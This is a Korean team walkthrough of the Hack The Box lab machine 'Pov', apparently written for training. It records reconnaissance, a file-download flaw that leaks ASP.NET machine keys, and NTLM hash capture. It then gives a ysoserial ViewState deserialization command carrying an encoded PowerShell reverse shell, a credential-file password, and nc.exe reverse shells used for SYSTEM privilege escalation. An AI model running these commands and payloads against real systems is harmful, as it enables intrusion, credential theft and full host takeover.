팀으로 진행했던 pov! 역시 같이 해야 재밌엉~
사이트 분석
- nmap: 80 포트만 외부로 열려있음
┌──(root㉿DESKTOP-SQ6IV61)-[/home/surckers]
└─# nmap -sCV -p 80 10.129.230.183
Starting Nmap 7.94SVN (
<https://nmap.org/>
) at 2024-05-30 16:51 KST
Nmap scan report for 10.129.230.183
Host is up (0.33s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|
*http-title: pov.htb
| http-methods:
|*
Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at
<https://nmap.org/submit/>
.
Nmap done: 1 IP address (1 host up) scanned in 16.95 seconds
- gobuster
- subdomain 검색
- vhost
┌──(root㉿kali)-[/HTB/pov]
└─# gobuster vhost -u pov.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 --append-domain | grep 302
Found: dev.pov.htb Status: 302 [Size: 152] [--> **<http://dev.pov.htb/portfolio**/>]
vhost, 즉 가상 호스트(Virtual Host)는 단일 웹 서버가 여러 웹 사이트를 호스팅하게 해주는 웹 서버 기능입니다. 이를 통해 여러 도메인 이름을 동일한 IP 주소에 연결할 수 있습니다.
- 홈페이지 탐색
근데 알고보니까 여기도 있었음,,,
사이트분석(dev.pov.htb)
_VENTTARGET=download
POST /portfolio/ HTTP/1.1
Host: dev.pov.htb:48080
Content-Length: 363
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: <http://dev.pov.htb:48080>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: <http://dev.pov.htb:48080/portfolio/>
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=ucSRpHVADjgSZbuxcPh7ij6V6uqrkufYyPRAqKwA1%2FubeP5ygwye6dUmsLGORRiSoP3UdTX000jku8SyE%2BK9y%2F6QPNA%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=yaxvzvJC0hbPiX6Ohb6Setecx8rQv9LrQ1hp6LOod6SLOtp77pxHkldLL%2BdyKGbJMqBc1JnRHnxZv8jiIGs%2FWVatF9JY2H8RThPm6dVCxbXRdZPBtW6J6PQME5pvMpgggA0TKg%3D%3D&file=default.aspx
다운로드 취약점을 이용해 web.config 파일을 읽어보니 decryptionKey, validationKey 같은 정보가 있음
contact.asp.cs 등 여러 파일을 다운로드 받아서 확인해봤지만, 추가 취약점은 발견되지 않음
index.asp.cs (filedownload 하는 코드) : TransmitFile은 외부URL를 바라볼 수 있음
public partial class index : System.Web.UI.Page {
protected void Page_Load(object sender, EventArgs e) {
}
protected void Download(object sender, EventArgs e) {
var filePath = file.Value;
filePath = Regex.Replace(filePath, "../", "");
Response.ContentType = "application/octet-stream";
Response.AppendHeader("Content-Disposition","attachment; filename=" + filePath);
Response.TransmitFile(filePath);
Response.End();
}
}
SMB 실행
smbserver를 켠 상태에서 다운로드 주소를 서버로 향하게 하면 NTLM 해쉬를 획득할 수 있음
┌──(root㉿kali)-[~/CrackMapExec]
└─# **poetry run impacket-smbserver test /share -smb2support**
Impacket v0.12.0.dev1+20230909.154612.3beeda7c - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.227.55,49672)
[*] AUTHENTICATE_MESSAGE (POV\\sfitz,POV)
[*] User POV\\sfitz authenticated successfully
[*] sfitz::POV:aaaaaaaaaaaaaaaa:a14f74b0362110084f4f1c3a4628ed83:010100000000000080ac17e20db3da011c9b238901ad3a8800000000010010004f00590041005a004900460064004900030010004f00590041005a004900460064004900020010006e006f00550050004400560075006d00040010006e006f00550050004400560075006d000700080080ac17e20db3da01060004000200000008003000300000000000000000000000002000004fdea9676f4d8327a0e030613cc298b28b236bbeca1e000ff8586b6754c6a9d60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0033000000000000000000
[*] Closing down connection (10.129.227.55,49672)
[*] Remaining connections []
외부로 80 서비스 포트만 열린 상태는 아래와 같은 가정과 결론을 도출할 수 있음
- [x] 평문을 획득하는 크랙은 현재 상태를 해결할 수 있는 수단은 아님 (john, hashcat 도구로 크랙을 시도해 보았으나, 평문을 획득할 수 없었음)
- [x] SQLI → xp_cmdshell (코드를 내려받아 확인한 결과, DB와 연결되지 않음)
- [x] 파일 업로드 히든 페이지 (찾을 수 없었음)
- [x] TransmitFile 함수의 RFI??? (Download 함수에서 확인되지 않음)
- [ ] 서버나 기타 환경의 RCE 취약점 ????
#┌──(root㉿DESKTOP-SQ6IV61)-[/usr/share/hashcat]
└─# john --verbosity=6 --wordlist=rockyou.txt /mnt/d/HTB/pov/hash.txt
initUnicode(UNICODE, UTF-8/ISO-8859-1)
UTF-8 -> UTF-8 -> UTF-8
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Loaded 6 hashes with 6 different salts to test db from test vectors
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 DONE (2024-05-31 13:28) 0g/s 3078Kp/s 3078Kc/s 3078KC/s !Sketchy!..*7¡Vamos!
Session completed.
└─# hashcat -m 5600 /mnt/d/HTB/pov/hash.txt rockyou.txt -o pov.cracked --force
hashcat (v6.2.6) starting
<... SKIP ...>
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SFITZ::POV:aaaaaaaaaaaaaaaa:a14f74b0362110084f4f1c3...000000
Time.Started.....: Fri May 31 13:32:33 2024, (12 secs)
Time.Estimated...: Fri May 31 13:32:45 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1247.2 kH/s (0.77ms) @ Accel:256 Loops:1 Thr:1 Vec:16
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Started: Fri May 31 13:32:17 2024
Stopped: Fri May 31 13:32:46 2024
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new) 이면 크랙된게 없는거에요
결국 위 사례로 여러가지 시도하던 중, viewstate 파라미터에 역직렬화 취약점이 존재한다는 것을 알 수 있었음 하지만, .net 버전, EnableViewStateMac, ViewStateEncryptionMode 의 적용한 상태에 따라 Exploit의 가능성이 달라짐
ViewState 역직렬화 취약점
poc 생성기 → https://github.com/pwntester/ysoserial.net
poc 에 넣을 페이로드 생성기 → https://www.revshells.com/
취약점 설명 → https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter
Test Cases
: viewstate 취약점 활용의 경우의 수 중 pov 는 2번 (X-AspNet-Version: 4.0.30319) ⇒ MachineKey 필요
The image is a table detailing different configurations for ViewState in ASP.NET based on the .NET framework version. Here's a summary of the content:
- For any version of .NET, when both MAC and Encryption are disabled, a MachineKey is not required, and thus there's no applicable method to identify it.
- For versions below 4.5, if MAC is enabled but Encryption is not, a MachineKey is required. The method to identify the MachineKey is referred to as "Blacklist3r."
- For versions 4.5 and above, all combinations of MAC and Encryption (whether both are true, or one is true and the other is false) necessitate a MachineKey. The MachineKey can be identified using "Blacklist3r."
- For versions below 4.5, regardless of whether MAC is enabled or disabled, if Encryption is enabled, a MachineKey is needed. Identifying the MachineKey is a task for "Blacklist3r - Future Development."
How to obtain MachineKey?
(세가지 방법이 있는데, 우리는 이미 두번째를 통해, MachineKey를 획득 했음 역쉬, 종훈선임님 칭찬해 👏👏👏 )
There are multiple ways but not limited to the following to obtain the Machine Key used by a .NET application:
- Blacklist3r: If the application uses pre-shared machine key
- Directory Traversal attack to get access to web.config file
- Information Disclosure
역직렬화 코드를 만들어주는 ysoserial 툴에 다운로드 취약점 (web.config)으로 획득한 decryptionKey, validationKey 을 적용해 리버스커넥션이 가능한 페이로드(viewstate) 생성
(요소시리얼 exe 파일 압축 해제 폴더 위치는 어딘지 안비밀)
C:\\Users\\---\\ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9\\Release>ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwAOAA4ADgAOAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
POST /portfolio/default.aspx HTTP/1.1
Host: dev.pov.htb:48080
Content-Length: 3547
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: <http://dev.pov.htb:48080>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: <http://dev.pov.htb:48080/portfolio/default.aspx>
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=**4jaX09UGPH5tOXYeEtvBAqKTbi74yw22CEbQXu7a0Li%2FWX3sF5ERhgcjBSrGNjIxpHadLNFbDwZeHPsef4xSxBdAXwrvqFu0fbjqRxNVpChkjcSV9T9JaEFGxjxUhot4M2ltsrdHe38C3tFtpQow3DvGgMBF7ryE8q7ragI5BpJUVbteNLf%2Be1HvikmmlPCN247LctBnRKTSd8QSrbAytu81XmcIPoULKbq3Rh7kjv5HNtabZ506HLoFiMj5NjiQk8iEO9ee7%2FayuA2uCDiOe4acF%2FqWQ5aaE8NUQad30L%2FzWqwnwAFtYSAxXb2Og0e1cAfZg7pDJJ4tcTPtA2mb6GRWckxjDThtfNpYLkIsOV9gbuSUjAtUTyCIkSsKhfFod%2FZE%2FT%2FBsJoxqUuWuDJqkz4ye1fpAMF%2Fb5WPDN%2FdhmAeAmTnJQvmWb%2B26c1Djx3ZPt71jrBCbY%2BBXRXz5k1FvyN3e885SGbGS%2B4YeGwLRShU8rTSszeFSqi%2Ftl%2FdW37H3Q2mKxq3Zm5mQpeYCkOPU2%2FVcJxyVhFH%2FQ13%2BbBd8gvqRooSvY513AfC002w0GVCA3R%2FsXZdYv2jsV1QzM%2BvrDvZ7r%2FjDPGdJVgwGdPGHYbr0gkr%2BuwMUQiJok5whdgiA5JuE0cVvWt%2FtZp%2BM3acdWS0h91EzUd2cCf4r%2BcCjft501M0eANflf7T2UBF3YL1sqvEehbbzjfkub9eTrltHbxcOtXkaobvA4Oe9hbnphCGzT1Tx4%2B0gMQflaRva3RgtANwfV0QDiq0JvvabLmE1Qn1KqYopzqaMJkewa%2FqGg1JQuSH5aMqb1F%2BGaV7nGW5TIHkD4Lfi9S0B1Bj%2B1srpkWNLf7%2FBb1YPk74prd2Y283QDS1rWopovmD3l00%2BUDaf9gEzRB7olxvGeUV1o%2BBIf63sr9KvFrxu6rDyux%2BdPI8kt9BfJovuPDhm9gBnU0pDUaICqTSpmvGYu2fIFI7SLfNn%2FuO0yvCP1mXI6xuBMsnjVtF1KQfku0O2an6svCyHolrsHUD0ygauzc%2FeDs9XIZgKgD6o4%2F3cuUl4%2FEVPd8yj2HklaWaWJoQGWd4Y76%2FQGBFeNeF0KncG4ed%2Fw9PcSz1j4EsPkTwLivp7j6wSG872bJ5dKaii51q9meJ0bNQoEuSkBImXoHmj61OsvtWFiZ%2FsND0y9GjAxqu83rO3wtfQGZjYfrWhPdiVuCpUfMqZnj3l8QTkpXk5GHAn0CbtM5y%2FbfC%2B9Dt9i2fEyn2HStzKSMZZ0%2Fi3Bo1095NpAZvNyFOE2B8BTw2BCHRY4kFs5gKBecD%2FioQkN9yTs721Z0qIA6gLySJpIWDM9GwZZj1WprFTCjFFWtq%2BPvMRpf%2F8hc92EAO%2BDjyqA47xz%2Bp1y%2Bmj31iEnUgCuILXBjiv9L5jfp0gtYzviVgqAB5Laj8nOdQHP22hr%2FOXKt1KSwpqVadW4yQdYHESCF%2B0fRaPdzK53q0iGwvHE8GkcrPRazXteXwLkxHSCwwK%2B2rHELtKm07DwhGaOgHmq72Jf9ZTZBbg58rqyFYrCN0SZX3xaT%2BNi1vGju0YmePEqJtWTRKtFx3BmU16HR7WKyDktR%2FJlo6bKgY3%2FuXnUHP7kaIVUVMISxxByTWN0%2FohVe8v2dsRecflRPoRG%2FrjM07JcPPIF0qQPoxCkkM33A%2FiOroM2xq%2BBNoIAg1fo9B3la2vCKKf5iHXwQuxwJWDhPpI%2BJocLYriJA7xOFXRucq6shxgo1KkjPmPzrz6zzcH8sCqZ%2BhkP6com8HEIVaksZUZLSjFxHq7pfa3VaMmTtinZX0mDZ5Rti0DtITEktyZzIlLhKs52wjovd2ZYgbCwlH27Lb%2FjsdtvGCIclhM8ti4byVJbvZAh7SGAaJe0aNXj5migGyfdsBpkemfImQdmwrbPYUmtC6BMgbvqPD7HPbukV6Ivn2N08ABRcnC%2Bp%2Fss8bh6YPtRi5eAmCcbTxINr%2F4%2BgPLSbhZAGERv%2FLL1hAzQDySC6d3CHqBV1pX4d2o%2BAdZ%2BM53Wt6D3CgIxCsw4%2BSf7IEdcilGqlzwvS4xdYeVMUCorf3AAia8JwvmW7fkWTkQ8U4%2BfH03lDE3Ir4s9yXfg2vVmUybAkSUfTOPR8y37KygVvmaYUj9EsrH9MNu%2BRwGRShDw0o8y2fDMvTU6ZPnq1uoCFTfkQNAHtFzkQIQNKKx%2B41liQ5f6M%2FR4K4M3MVIEJcHtt9h37BhH6BTx3s8a9RAUUUXyTyueU6Y09eSKSitjJbZDsCBjmqpfRt6liHMx0CiKVWibxdMsBC%2FuoR24tylD79ehXC4Vbh2kftI4zEyeZxZ8iMhI4JPYftsbyvRFtzzea1SOOtBscjQddJ7E0DLniW%2BbwpEllJap%2FmUzQ9bKKNEUh9KGrtnp8d3EqdIHY5NUH%2Bc%2FGgPWporsmLDyktr%2BIAvTeVSb06%2FeOztIVm8lTWDsGVQxF13AI89L25Eyxbt4NCJKS4kAPADQwO%2B9tTZXz3r9eMy6s1U3x1qf0UlhJ9KtX5%2Be%2FjPMJnkL24MoIlL3x4o68Vt8eoEC80N74LboFxAzGfYVCuHCt%2FPuRjJcQsLmoGdhJJi4Ck%2BbkoGMbTPRmf3rbtz0zPmm%2BOegbs6rTv8p5jI5MuNale7gyXetvwj%2BsuAnbbnSzxaPYudSsyHyyEh9NgxLeYTYQYjjzNRYtWwXqU6wIMRCGyPwLQ3Y%2B0JJ6XWmr3HnZFoh%2F4kc99ogkL%2FzZV9zvVq2i8W8K%2FmpV%2BKhLrRJHZ6kbYhjc0cbjDKpvmzdsKx%2B0QDBGa2uWsR100yMeL6NgIvl9ZL7HXrl3nyfQc%2BfvGjd5IUGzK5eeC%2FqkKzQ0mcKGzV1U%2BSyOskAcH90rmsHRd%2B%2BfftPF%2BEIyJ4jDLGG7spTQJlAyY9N0%2BKNaNdhHpN9rgrEpRyRkFRNU4Cjvw77ALIYEotqwCSaxdBHp5cvBvDWV8S1mr7TO0C5A4efvojBIDsW6ZxUrhf0JHClQskaRLGjlUwYcgJkr14s5H2R6xnFp%2BJj7tJc%2FTXBd0LLUz0sS5O3WhOjSLxaqwUu47OWMaByf3OGsSd1fgpttLvQ%3D%3D**&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=T5AEKgx5jK4TftNysEuBJQi3ob8Cd4ESUotbDNQs6f%2BDsmNeg3SBoaXLHTUi98k8acrDhSa4jMsYq13E9v6%2BOJOIUT1fUyW3KV86jYhg0luJgceju6sGrSVUIsgtvauwqwvp1w%3D%3D&file=cv.pdf
pov\sfitz 사용자 쉘로 접근할 수 있었지만, 유저 플래그를 확인할 수 없음
C:\Users\ 하위 폴더에서 파일을 검색하면 lnk, xml 확장자 파일이 보이고, 이 중 connection.xml 파일을 열어보기로 한다.
User Step
PS C:\\USERS\\sfitz\\documents> dir
Directory: C:\\USERS\\sfitz\\documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/25/2023 2:26 PM 1838 connection.xml
PS C:\\USERS\\sfitz\\documents> type connection.xml
System.Management.Automation.PSCredential
System.Object
System.Management.Automation.PSCredential
alaading
01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6
PS C:\\USERS\\sfitz\\documents> net user
User accounts for \\\\POV
System.Management.Automation.PSCredential
⇒ PowerShell에서 자격 증명을 안전하게 관리하기 위해 사용되는 클래스입니다. 이 클래스는 사용자 이름과 암호를 안전하게 저장하고 사용하기 위한 표준화된 방법을 제공
- $credential = Import-Clixml -Path "C:\path\to\your\credentials.xml"
- $Password= $credential.GetNetworkCredential().Password
키워드 system.management.automation.pscredential decrypt password
connection.xml에 있는 패스워드를 알아냄
계정을 통한 Command 입력 방법 두가지
- RunasCs 사용
- Invoke-Command 사용
Invoke-Command 사용먼저 해보면,
PS C:\\tmp> $Credential = Import-Clixml -Path .\\connection.xml
PS C:\\tmp> echo $Credential
UserName Password
-------- --------
alaading System.Security.SecureString
Invoke-Command -ComputerName 'pov' -Credential $Credential -FilePath .\\reverse.ps1
Medium Manatory Level
RunasCs 사용
PS C:\\Windows\\temp\\test> ./RunasCs.exe alaading f8gQ8fynP44ek1m3 cmd -r 10.10.14.92:2222
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-8e311$\\Default
[+] Async process 'C:\\Windows\\system32\\cmd.exe' with pid 1820 created in background.
High Mandatory Level (관리자 권한)
=⇒ RunasCs 로 해야 권한 상승 수행 가능
권한상승
SeDebugPrivilege, SeChangeNotifyPrivilege 가 enabled 되어 있음
일반적으로 디버깅 권한이 있다는 것은 상대 프로세스에 대한 모든 권한을 갖는 상태를 의미하므로 권한상승이 가능한지 확인해본다.
우리가 일반적으로 mimikatz를 사용할 때 privilege::debug 이 SeDebugPrivilege 권한을 활성화시키는 명령어인 듯…
seDebugPrivilege 활용
⇒ 다른 프로세스 디버그 할수 잇는 권한이며, 메모리에 있는 프로세스 또한 읽고 쓸 수 있다. 다양한 메모리 인젝션 및 AV, host IPS 우회를 사용 할 수 있다.
=⇒ psgetsys.ps1 으로 RCE 수행
Release SeDebugPrivesc · bruno-1337/SeDebugPrivilege-Exploit · GitHub
=⇒ SeDubugPrivesc.exe 사용하여, NT 권한 획득
두번째 exe 파일 사용, 받아서 alaading에 넣기
일단 실행해봤는데 PID를 알아야하나..? 위 실행파일은 입력으로 받는 PID 값의 자식 프로세스를 생성하는 코드임. SeDebugPrivilege 권한이 부여된 사용자이기 때문에 가능함
ps 목록 조회
PS C:\\Users\\alaading> ps
ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
81 5 2236 3796 0.02 2012 0 cmd
81 5 2240 3792 0.02 2804 0 cmd
159 10 6668 12756 0.95 2696 0 conhost
133 7 2904 7544 0.08 3584 0 conhost
159 10 6672 12664 0.05 3888 0 conhost
435 18 2280 5324 0.42 376 0 csrss
167 13 1628 4728 0.11 488 1 csrss
262 14 3832 13676 0.23 3484 0 dllhost
533 22 17820 36856 0.45 996 1 dwm
53 6 1508 4108 0.03 760 0 fontdrvhost
53 6 1628 4380 0.03 936 1 fontdrvhost
0 0 56 8 0 0 Idle
471 27 10752 46768 0.39 4140 1 LogonUI
926 23 5432 15152 1.86 632 0 lsass
234 13 2880 10600 0.02 3752 0 msdtc
1151 32 79912 91612 1.09 1992 0 powershell
571 32 120516 133208 2.23 2408 0 powershell
565 31 116764 125184 2.28 3908 0 powershell
0 13 336 12184 4.28 88 0 Registry
506 11 4612 9460 1.88 612 0 services
53 3 532 1224 0.22 292 0 smss
309 20 9112 15188 0.17 64 0 svchost
... skip ...
319 18 5904 22460 0.45 5116 0 svchost
1498 0 192 152 8.23 4 0 System
172 11 2892 11556 0.05 2260 0 VGAuthService
156 9 1796 7260 0.05 2268 0 vm3dservice
156 10 1928 7636 0.02 2836 1 vm3dservice
400 23 10620 22436 0.86 2252 0 vmtoolsd
172 11 1344 6924 0.08 480 0 wininit
**255 12 2648 16260 0.27 548 1 winlogon** tas
368 17 13772 24656 14.59 3828 0 WmiPrvSE
nc.exe 넣고, winlogon PID로 exploit 해주기
왜 winlogon일까..? 모르겠지만 하튼 이렇게.. ⇒ 꼭 winlogon이 아니더라도 SYSTEM 권한으로 돌고 있는 프로세스를 타깃으로 실행하면 됩니다.
./SeDebugPrivesc.exe 548 ".\nc.exe 10.10.14.20 9006 -e cmd.exe”
administrator 권한으로 쉘 붙음
루트!! (administrator 사용자를 얻은 것이 아닌 SYSTEM 사용자의 자식인 불안정한 쉘이므로 일부 데이터는 안나올 수 있어보임)
@박경진 진행 사항
C:\\Users\\alaading>SeDebugPrivesc.exe 552 ".\\nc.exe 10.10.14.92 7777 -e cmd.exe”
SeDebugPrivesc.exe 552 ".\\nc.exe 10.10.14.92 7777 -e cmd.exe”
pid= 552
Failed to open the process. Error: 5
error 5 권한 문제인데, tasklist 에 session 1인 값에 대해서 전부 안됨.
1번 방법으로 다시 시도 해보려고 했으나, 시간 프로블럼으로 여기까지
진안선임님 멋져용~!
👍👍👍👍👍👍👍
이하 권한 상승을 하기 위해 했던 노력들,
winpeas 는 해당 CVE 알려줘서 좋은 것 같음 굳굳~
winpeas (돌다만 것) (appcmd?)(실패)
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] **<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe**>
C:\\Windows\\system32\\inetsrv\\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#>
... skip ...
winpeas에서 발견된 appcmd를 아래 파워쉘로 실행한 결과 취약하지 않음
winpeas
아래 12개 취약점 중 권한 상승과 관련된 취약점을 시도 (CVE-2019-0836, CVE-2020-1013 될지도?)
appcmd에서 정확하지 않을 수 있다는 것을 확인했기 때문에 일단 보류
����������������������������������� System Information �������������������������������������
���������� Basic System Information
� Check if the Windows versions is vulnerable to some known exploit <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits>
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hostname: pov
ProductName: Windows Server 2019 Standard
EditionID: ServerStandard
ReleaseId: 1809
BuildBranch: rs5_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 6/10/2024 3:26:59 AM
HighIntegrity: False
PartOfDomain: False
Hotfixes:
[?] Windows vulns search powered by Watson(<https://github.com/rasta-mouse/Watson>)
[*] OS Version: 1809 (17763)
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
[>] <https://exploit-db.com/exploits/46718>
[>] <https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/>
[!] CVE-2019-0841 : VULNERABLE
[>] <https://github.com/rogue-kdc/CVE-2019-0841>
[>] <https://rastamouse.me/tags/cve-2019-0841/>
[!] CVE-2019-1064 : VULNERABLE
[>] <https://www.rythmstick.net/posts/cve-2019-1064/>
[!] CVE-2019-1130 : VULNERABLE
[>] <https://github.com/S3cur3Th1sSh1t/SharpByeBear>
[!] CVE-2019-1253 : VULNERABLE
[>] <https://github.com/padovah4ck/CVE-2019-1253>
[>] <https://github.com/sgabe/CVE-2019-1253>
[!] CVE-2019-1315 : VULNERABLE
[>] <https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html>
[!] CVE-2019-1385 : VULNERABLE
[>] <https://www.youtube.com/watch?v=K6gHnr-VkAg>
[!] CVE-2019-1388 : VULNERABLE
[>] <https://github.com/jas502n/CVE-2019-1388>
[!] CVE-2019-1405 : VULNERABLE
[>] <https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/>
[>] <https://github.com/apt69/COMahawk>
[!] CVE-2020-0668 : VULNERABLE
[>] <https://github.com/itm4n/SysTracingPoc>
[!] CVE-2020-0683 : VULNERABLE
[>] <https://github.com/padovah4ck/CVE-2020-0683>
[>] <https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1>
[!] CVE-2020-1013 : VULNERABLE
[>] <https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/>
[*] Finished. Found 12 potential vulnerabilities.
Local Privilege Escalation (PrivescCheck)
PS C:\\tmp> wget -o PrivescCheck.ps1
PS C:\\tmp> . .\\PrivescCheck.ps1
PS C:\\tmp> Invoke-PrivescCheck
????????????????????????????????????????????????????????????????
? CATEGORY ? TA0043 - Reconnaissance ?
? NAME ? User identity ?
????????????????????????????????????????????????????????????????
? Get information about the current user (name, domain name) ?
? and its access token (SID, integrity level, authentication ?
? ID). ?
????????????????????????????????????????????????????????????????
[*] Status: Informational
Name : POV\\sfitz
SID : S-1-5-21-2506154456-4081221362-271687478-1000
IntegrityLevel : Medium Mandatory Level (S-1-16-8192)
SessionId : 0
